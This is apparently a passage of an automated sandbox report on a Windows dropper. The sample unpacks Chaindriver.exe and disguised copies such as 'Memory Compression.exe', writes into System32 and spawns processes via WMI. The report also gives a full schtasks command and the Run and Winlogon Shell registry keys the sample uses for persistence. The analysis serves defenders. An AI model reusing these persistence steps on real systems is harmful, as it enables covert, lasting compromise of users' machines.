                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
                          Source: t8F7Ic986c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: t8F7Ic986c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: t8F7Ic986c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: t8F7Ic986c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: t8F7Ic986c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeFile created: C:\\__tmp_rar_sfx_access_check_5407312Jump to behavior
                          Source: t8F7Ic986c.exeStatic PE information: section name: _RDATA
                          Source: BoosterX.exe.0.drStatic PE information: section name: .didat
                          Source: BoosterX.exe.0.drStatic PE information: section name: _RDATA
                          Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                          Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                          Source: Chaindriver.sfx.exe.4.drStatic PE information: section name: .didat
                          Source: Chaindriver.sfx.exe.4.drStatic PE information: section name: _RDATA
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA24B5F push ecx; retf 8_2_00007FFD9BA24B64
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA24303 push cs; ret 8_2_00007FFD9BA2430F
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA23980 pushfd ; retf 8_2_00007FFD9BA23981
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1F2DA push esp; ret 8_2_00007FFD9BE1F2DB
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE14ABE push es; retf 8_2_00007FFD9BE14ABF
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1616D push ebp; ret 8_2_00007FFD9BE161D8
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1F16F push ebx; ret 8_2_00007FFD9BE1F170
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1F10E push ebp; ret 8_2_00007FFD9BE1F10F
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1EF6D push edi; ret 8_2_00007FFD9BE1EF71
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA04B5F push ecx; retf 34_2_00007FFD9BA04B64
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA04303 push cs; ret 34_2_00007FFD9BA0430F
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA03980 pushfd ; retf 34_2_00007FFD9BA03981
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA001CD pushad ; retf 34_2_00007FFD9BA00286
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA000BD pushad ; iretd 34_2_00007FFD9BA000C1
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA18992 push edx; iretd 35_2_00007FFD9BA1899D
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA03980 pushfd ; retf 35_2_00007FFD9BA03981
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA04B5F push ecx; retf 35_2_00007FFD9BA04B64
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA001CD pushad ; retf 35_2_00007FFD9BA00286
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA04303 push cs; ret 35_2_00007FFD9BA0430F
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA000BD pushad ; iretd 35_2_00007FFD9BA000C1
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA03980 pushfd ; retf 36_2_00007FFD9BA03981
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA04B5F push ecx; retf 36_2_00007FFD9BA04B64
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA001CD pushad ; retf 36_2_00007FFD9BA00286
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA04303 push cs; ret 36_2_00007FFD9BA0430F
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA000BD pushad ; iretd 36_2_00007FFD9BA000C1
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA18992 push edx; iretd 36_2_00007FFD9BA1899D
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F4B5F push ecx; retf 37_2_00007FFD9B9F4B64
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F4303 push cs; ret 37_2_00007FFD9B9F430F
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F3980 pushfd ; retf 37_2_00007FFD9B9F3981
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9BDEF36B push ebx; ret 37_2_00007FFD9BDEF36F
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9BDE4ABE push es; retf 37_2_00007FFD9BDE4ABF
                          Source: Chaindriver.exe.7.drStatic PE information: section name: .text entropy: 7.541280330122405
                          Source: Memory Compression.exe.8.drStatic PE information: section name: .text entropy: 7.541280330122405
                          Source: RuntimeBroker.exe.8.drStatic PE information: section name: .text entropy: 7.541280330122405
                          Source: NOFqHeDosUIopsPGLT.exe.8.drStatic PE information: section name: .text entropy: 7.541280330122405
                          Source: NOFqHeDosUIopsPGLT.exe0.8.drStatic PE information: section name: .text entropy: 7.541280330122405

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Found pyInstaller with non standard icon
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\Zfmnrnxn.logJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeFile created: C:\Chaindriver.sfx.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pydJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pydJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pydJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\HTKiXRcY.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Recovery\NOFqHeDosUIopsPGLT.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pydJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\TkRgFrOc.logJump to dropped file
                          Source: C:\Chaindriver.sfx.exeFile created: C:\Chaindriver.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dllJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\Default\Pictures\RuntimeBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\select.pydJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\BXpblVtN.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pydJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\VCRUNTIME140.dllJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\KGIrVxyv.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\FnBzuKhI.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\PxTXHLsG.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\viEjRGTv.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pydJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Recovery\Memory Compression.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\viEjRGTv.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\Zfmnrnxn.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\PxTXHLsG.logJump to dropped file
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\HTKiXRcY.logJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\FnBzuKhI.logJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\TkRgFrOc.logJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\KGIrVxyv.logJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeFile created: C:\Users\user\Desktop\BXpblVtN.logJump to dropped file

                          Boot Survival

                          barindex
                          Creates an undocumented autostart registry key
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Chaindriver.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChaindriverJump to behavior
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChaindriverJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChaindriverJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChaindriverJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChaindriverJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Chaindriver.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLTJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED53F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF652ED53F0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.sfx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
